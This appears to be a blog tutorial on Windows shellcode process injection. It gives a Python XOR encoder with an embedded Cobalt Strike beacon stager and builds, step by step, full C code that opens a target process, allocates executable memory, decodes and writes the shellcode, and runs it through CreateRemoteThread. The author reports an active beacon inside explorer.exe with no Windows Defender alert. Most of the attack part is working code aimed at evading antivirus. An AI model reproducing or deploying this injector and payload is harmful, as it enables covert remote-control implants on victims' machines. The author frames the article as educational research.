Introduction

Over the past week, I researched Win32 APIs and how they can be used when weaponizing an attack. My previous work involved process injection, and the goal this time was to go further with more sophisticated techniques.

I took a simple vanilla shellcode injection implementation in C and enhanced it with a decoding routine. The shellcode is stored in the binary in encoded form, then decoded at runtime as it is written to the target process's memory.

The vanilla process injection technique involves four basic steps:

  • Open the process and retrieve a HANDLE for that process
  • Allocate space in that process
  • Write your shellcode to that process
  • Execute it

Process Injection 101

The technique uses four key Win32 APIs:

  • OpenProcess() - Opens a process and retrieves a handle
  • VirtualAllocEx() - Allocates space in the remote process
  • WriteProcessMemory() - Writes data inside that process
  • CreateRemoteThread() - Executes the shellcode

In normal cases, raw shellcode is written directly to memory. However, if AVs/EDRs detect the shellcode, they raise an alert. The solution: encode the shellcode and save it within the binary, then decode and write it to memory at runtime to avoid detection.

Shellcode Encoding

Shellcode must be encoded in a reversible way so that the original bytes can be recovered. Common encoding methods include:

  • XOR
  • ADD
  • Subtract
  • SWAP

This article applies a bitwise XOR to each byte of the shellcode. The example uses a Cobalt Strike beacon as shellcode (887 bytes).
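To make the "reversible" requirement concrete, here is a minimal sketch of two of the other listed methods applied to harmless sample bytes. The function names and the sample data are my own, and reading SWAP as a swap of the two 4-bit halves of each byte is an assumption, since the list does not define it.

```python
# Harmless sample bytes standing in for arbitrary binary data (illustrative only).
SAMPLE = bytes([0x00, 0x41, 0x7F, 0xFC, 0xFF])


def add_encode(data: bytes, key: int) -> bytes:
    """Add the key to every byte, wrapping around at 256."""
    return bytes((b + key) % 256 for b in data)


def sub_decode(data: bytes, key: int) -> bytes:
    """Subtract the key from every byte, wrapping at 256 (inverse of add_encode)."""
    return bytes((b - key) % 256 for b in data)


def swap_nibbles(data: bytes) -> bytes:
    """Swap the high and low 4 bits of every byte (assumed meaning of SWAP)."""
    return bytes(((b << 4) | (b >> 4)) & 0xFF for b in data)


if __name__ == "__main__":
    # ADD needs SUB as its decoder; the pair restores the input.
    assert sub_decode(add_encode(SAMPLE, 0x01), 0x01) == SAMPLE
    # A nibble swap is its own inverse, like XOR with a fixed key.
    assert swap_nibbles(swap_nibbles(SAMPLE)) == SAMPLE
    print(add_encode(SAMPLE, 0x01).hex())
    print(swap_nibbles(SAMPLE).hex())
```

The point of the comparison is that ADD and Subtract form an encoder/decoder pair, while XOR and the nibble swap undo themselves, so the same routine serves both directions.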

Python Encoder Script

#!/usr/bin/python

import sys

raw_data = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x56\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x35\x6e\x6b\x4f\x00"

new_shellcode = []
for opcode in raw_data:
        new_opcode = (ord(opcode) ^ 0x01)
        new_shellcode.append(new_opcode)

print "".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in new_shellcode])

The script XORs each byte with 0x01 (the encoding key). The same value is used to decode: XORing a byte twice with the same key returns the original value.

hex(ord("\xfc") ^ 0x01) = 0xfd
hex(ord("\xfd") ^ 0x01) = 0xfc
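The same round trip can be checked against the bytes shown in this article. The sketch below is written for Python 3 and uses only the first ten bytes of raw_data and the first ten bytes of the encoded array from the C listings; the helper name xor_bytes is my own.

```python
KEY = 0x01  # encoding key used throughout the article

# First ten bytes of raw_data from the encoder script.
raw_prefix = bytes.fromhex("fc4883e4f0e8c8000000")
# First ten bytes of the encoded array shown in the C listings.
encoded_prefix = bytes.fromhex("fd4982e5f1e9c9010101")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key."""
    return bytes(b ^ key for b in data)


if __name__ == "__main__":
    # Encoding the raw prefix yields the encoded prefix ...
    assert xor_bytes(raw_prefix, KEY) == encoded_prefix
    # ... and applying the same operation again restores the raw bytes.
    assert xor_bytes(encoded_prefix, KEY) == raw_prefix
    print(xor_bytes(raw_prefix, KEY).hex())  # fd4982e5f1e9c9010101
```

Note that the 0x00 bytes become 0x01, which is why the encoded array contains no NUL bytes in this prefix.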

Shellcode Encoder Output

Open Process and Retrieve Handle

The first step requires opening a target process and getting a handle:

#include <windows.h>

int main(int argc, char *argv[]){

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);
  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

The OpenProcess() function takes three parameters: desired access rights, handle inheritance flag, and process ID. PROCESS_ALL_ACCESS grants full control. Upon success, the handle is stored and printed.

Handle Retrieved Successfully

Allocate Space on Remote Process

After retrieving the handle, space must be allocated in the target process using VirtualAllocEx():

#include <windows.h>

int main(int argc, char *argv[]){

   char data[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){
        printf("[+] Allocated base address is %p\n", base_address);
    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

The base_address variable (LPVOID type) stores the allocated memory address. VirtualAllocEx() parameters:

  • process: The handle retrieved via OpenProcess()
  • NULL: No preferred address; the system chooses where to allocate the region
  • sizeof(data): Size of the region to allocate, in bytes
  • MEM_COMMIT | MEM_RESERVE: Allocation type (reserve and commit in one step)
  • PAGE_EXECUTE_READWRITE: Read, write, execute permissions

Note: Allocating RWX memory is not stealthy; EDRs may flag this as suspicious.

VirtualAllocEx Output

The allocated address can be verified by attaching a debugger (like x64dbg) to the target process and navigating to the returned address.

Figures: attaching x64dbg to explorer.exe, opening Go to Address, entering the address expression, and viewing the allocated memory space.

Write Data to Memory

This is the critical component. The shellcode is decoded byte-by-byte and written directly to memory:

#include <windows.h>

int main(int argc, char *argv[]){

   unsigned char data[] = "\xfd\x49\x82\xe5\xf1\xe9\xc9\x01\x01\x01...";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){

        printf("[+] Allocated base address is %p\n", base_address);

        int i;
        int n = 0;

        for(i = 0; i<=sizeof(data); i++){
            char DecodedOpCode = data[i] ^ 0x01;

            if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
                printf("[+] Byte written successfully!\n");
                n++;
            }
        }

    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

A for loop iterates through each shellcode byte. Each byte is XORed with 0x01 to recover the original byte, and WriteProcessMemory() writes that decoded byte to the target memory location.

WriteProcessMemory() parameters:

  • process: Handle from OpenProcess()
  • base_address+n: Target memory address (incremented for each byte)
  • &DecodedOpCode: Pointer to the decoded byte
  • 1: Number of bytes to write
  • NULL: The count of bytes actually written is not requested

Bytes Written to Memory

The debugger confirms that original bytes are successfully written to the allocated memory region.

Shellcode Written in Debugger

Executing the Shellcode

Finally, the shellcode is executed as a remote thread using CreateRemoteThread():

#include <windows.h>

int main(int argc, char *argv[]){

   unsigned char data[] = "\xfd\x49\x82\xe5\xf1\xe9\xc9\x01\x01\x01...";

  int process_id = atoi(argv[1]);

  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

  if(process){
    printf("[+] Handle retrieved successfully!\n");
    printf("[+] Handle value is %p\n", process);

    LPVOID base_address;
    base_address = VirtualAllocEx(process, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(base_address){

        printf("[+] Allocated base address is %p\n", base_address);

        int i;
        int n = 0;

        for(i = 0; i<=sizeof(data); i++){
            char DecodedOpCode = data[i] ^ 0x01;

            if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
                printf("[+] Byte written successfully!\n");
                n++;
            }
        }

        CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x5151);

    }else{
        printf("[-] Unable to allocate memory ...\n");
    }

  }else{
    printf("[-] Unable to retrieve process handle\n");
  }
}

CreateRemoteThread() parameters:

  • process: Handle from OpenProcess()
  • NULL: Default security descriptor
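  • 100: Initial stack size in bytes; the system rounds this value up to the nearest page
  • base_address: Thread start address, here the first byte of the written shellcode
  • NULL: No parameter is passed to the thread
  • 0: No creation flags, so the thread runs immediately after creation
  • 0x5151: Passed as lpThreadId, which is documented as a pointer to a variable that receives the thread identifier (NULL when the ID is not needed), not as a thread ID value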

Shellcode Written and CreateRemoteThread

Upon execution, an active beacon runs under explorer.exe without triggering Windows Defender.

Active Cobalt Strike Beacon

Conclusion

By encoding our shellcode and decoding it at runtime with this technique, we were able to run it inside another process without Windows Defender raising an alert in this test. The encoder can be customized, but the decoder must be modified accordingly. Code sections are written for educational purposes, and parts can be modified to meet specific execution requirements.